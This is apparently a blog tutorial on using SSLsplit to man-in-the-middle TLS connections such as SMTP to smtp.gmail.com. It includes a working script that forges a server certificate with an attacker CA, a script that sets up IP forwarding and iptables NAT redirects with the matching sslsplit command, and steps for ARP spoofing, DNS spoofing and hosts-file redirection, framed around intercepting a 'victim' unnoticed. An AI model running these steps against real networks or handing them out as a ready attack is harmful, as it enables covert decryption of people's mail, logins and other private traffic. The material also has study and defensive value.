I recently demonstrated how to use mitmproxy to perform a man-in-the-middle (MiTM) attack on HTTP(S) connections. mitmproxy is built for HTTP-based communication; it does not understand the other protocols carried over TLS/SSL, such as FTPS, SMTP over SSL, IMAP over SSL, or any other TLS/SSL-wrapped protocol.
SSLsplit is a generic TLS/SSL proxy for man-in-the-middle attacks against any protocol that is secured with TLS/SSL. It listens for incoming secure connections, intercepts them, and can log the decrypted SSL-based traffic.
1. How it works
SSLsplit works much like other SSL proxy tools: it acts as a broker between the client and the server. Once the traffic is redirected to the machine running SSLsplit (by changing the victim's default gateway, by ARP spoofing, or by other means), SSLsplit accepts the client's SSL connection and pretends to be the server the client wanted to reach. To do this it forges a certificate for that server on the fly, signed with the private key of a CA certificate that the client trusts. This only works if the client does trust that CA, which is why the CA certificate has to be installed on the victim.
For example, if a client wants to send e-mail through the Gmail SMTP server, smtp.gmail.com on port 465, SSLsplit generates a certificate for smtp.gmail.com and presents it to the client, posing as the Gmail mail server. In the upstream direction SSLsplit connects to the real Gmail server, behaving like a normal client, and forwards everything the actual client writes. The TLS session from the client therefore terminates at SSLsplit, which sees the plaintext.
If you are interested in the details, see the "how it works" section of the earlier blog post on HTTP interception with mitmproxy. The basic concept is the same and relatively easy to understand.
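To make the certificate forgery concrete, the following script reproduces by hand what SSLsplit does per connection: it creates a CA, forges a leaf certificate for the target host signed by that CA, and then checks which trust store accepts it. This is an added example, not code from the original post or from SSLsplit itself; the host name, file names, key sizes and the "unrelated CA" standing in for the victim's normal trust store are assumptions. It needs the openssl command-line tool.

```shell
#!/bin/sh
# Added example (not part of the original post, not SSLsplit's code): forge by
# hand the certificate SSLsplit generates on the fly, then check which trust
# store accepts it. Host name, file names and key sizes are assumptions.
set -eu

TARGET_HOST="smtp.gmail.com"            # server the victim thinks it is talking to
WORK="${WORK:-$(mktemp -d)}"            # scratch directory for keys and certificates

# Minimal OpenSSL config so the result does not depend on the system's
# openssl.cnf: the CA certificate gets an explicit CA:TRUE basicConstraints.
write_config() {
    cat >"$WORK/ca.cnf" <<'EOF'
[ req ]
distinguished_name = dn
prompt = no
x509_extensions = v3_ca
[ dn ]
CN = placeholder
[ v3_ca ]
basicConstraints = critical, CA:TRUE
keyUsage = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
EOF
}

# A self-signed CA (key + certificate), i.e. what SSLsplit is handed as the
# signing CA. Usage: make_ca <basename> <common name>
make_ca() {
    openssl req -x509 -config "$WORK/ca.cnf" -newkey rsa:2048 -nodes -days 365 \
        -keyout "$WORK/$1.key" -out "$WORK/$1.crt" -subj "/CN=$2" 2>/dev/null
}

# Forge a leaf certificate for TARGET_HOST signed by the CA named in $1.
# SSLsplit does the equivalent per connection, copying the real server's
# subject; here the name goes into CN and subjectAltName so that hostname
# verification passes as well.
forge_leaf() {
    openssl req -new -config "$WORK/ca.cnf" -newkey rsa:2048 -nodes \
        -keyout "$WORK/leaf.key" -out "$WORK/leaf.csr" -subj "/CN=$TARGET_HOST" 2>/dev/null
    printf 'basicConstraints = CA:FALSE\nsubjectAltName = DNS:%s\nextendedKeyUsage = serverAuth\n' \
        "$TARGET_HOST" >"$WORK/leaf.ext"
    openssl x509 -req -in "$WORK/leaf.csr" -CA "$WORK/$1.crt" -CAkey "$WORK/$1.key" \
        -CAcreateserial -days 30 -extfile "$WORK/leaf.ext" -out "$WORK/leaf.crt" 2>/dev/null
}

# Does a client whose trust store holds only the CA named in $1 accept the
# forged certificate for TARGET_HOST? Exit status 0 = trusted, non-zero = rejected.
trusted_by() {
    openssl verify -no-CAfile -no-CApath -CAfile "$WORK/$1.crt" \
        -verify_hostname "$TARGET_HOST" "$WORK/leaf.crt" >/dev/null 2>&1
}

write_config
make_ca attacker "SSLsplit demo CA"      # the CA that gets installed on the victim
make_ca unrelated "Some other CA"        # stands in for a trust store without it
forge_leaf attacker

if trusted_by attacker; then
    echo "victim with the attacker CA installed: accepts the forged $TARGET_HOST certificate"
fi
if ! trusted_by unrelated; then
    echo "victim without it: rejects the forged certificate (unknown issuer)"
fi
```

The two verify calls are the whole point: the same forged certificate is a valid, hostname-matching server certificate for a client that carries the attacker's CA, and an untrusted one for every other client. SSLsplit automates the forge_leaf step for whatever server the victim connects to.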
2. Installing and running SSLsplit
This section shows how to intercept SSL and non-SSL traffic.
2.1 Redirecting traffic
2.1.1 ARP spoofing: publish a false mapping of the default gateway's IP address to the attacker's MAC address, so that the victim sends its traffic to the attacker. This requires no physical access to the victim. See the arpspoof tool.
2.1.2 Change the victim's default gateway to the attacker's IP address. This is the easiest option if you have access to the victim device.
2.1.3 DNS spoofing: answer the victim's DNS queries with the attacker's IP address in place of the real server's entry. See a DNS spoofing tutorial.
2.1.4 Redirect individual domains by editing the victim's /etc/hosts file.
As mentioned above, the simplest way is to change the victim's default gateway address to the attacker's IP, which makes sure the traffic flows through your machine. Because the CA certificate has to be installed on the victim later, we need physical access to the victim machine anyway.
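Redirecting the victim's packets to the attacker's machine is only half of the redirection step: the machine must also forward IPv4 traffic (otherwise everything the victim does breaks and the attack is noticed), and the TLS ports must be steered into local ports where SSLsplit listens. The script below is an added example, not from the original post or from SSLsplit; the port pairs, listening address and file names are assumptions, and it prints the commands instead of running them unless APPLY=1 is set, because applying them needs root on the attacker machine.

```shell
#!/bin/sh
# Added example (not from the original post): gateway-side plumbing for the
# redirection step once the victim's packets arrive at this host. Port pairs,
# listening address and file names are assumptions; adjust them to the
# protocols you intercept.

# "<victim destination port> <local SSLsplit port>", one pair per line.
REDIRECTS="443 8443
465 8465
993 8993
995 8995"

# Commands are printed unless APPLY=1 is set, so the script is safe to read
# through first; applying them requires root on the attacker machine.
run() {
    if [ "${APPLY:-0}" = 1 ]; then "$@"; else echo "$*"; fi
}

# Without forwarding, the victim's non-intercepted traffic would be dropped
# at the fake gateway and the victim would notice immediately.
enable_forwarding() {
    run sysctl -w net.ipv4.ip_forward=1
}

# REDIRECT rewrites the destination of matching packets to this host on the
# given local port. SSLsplit's netfilter NAT engine recovers the original
# destination from the connection's NAT state, so it still knows which real
# server to connect to upstream.
redirect_rules() {
    echo "$REDIRECTS" | while read -r dport lport; do
        run iptables -t nat -A PREROUTING -p tcp --dport "$dport" \
            -j REDIRECT --to-ports "$lport"
    done
}

# The matching SSLsplit invocation: one "ssl <address> <port>" proxyspec per
# redirected port, -k/-c for the CA key and certificate used to sign the
# forged certificates, -l for the connection log.
sslsplit_cmd() {
    specs=$(echo "$REDIRECTS" | while read -r dport lport; do
        printf ' ssl 0.0.0.0 %s' "$lport"
    done)
    echo "sslsplit -k ca.key -c ca.crt -l connections.log$specs"
}

enable_forwarding
redirect_rules
echo "# then start the proxy:"
sslsplit_cmd
```

Run it once without APPLY to review the exact rules, then with APPLY=1 as root on the machine the victim now uses as its gateway. Ports you do not redirect (for example 80) pass through untouched thanks to the forwarding setting, which is what keeps the interception unobtrusive.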
Download and compile the SSLsplit
apt-get install libssl-dev libevent-dev    # build dependencies (OpenSSL and libevent headers)
bunzip2 sslsplit-0.4.7.tar.bz2
tar xvf sslsplit-0.4.7.tar
cd sslsplit-0.4.7 && make                   # builds the sslsplit binary in the source directory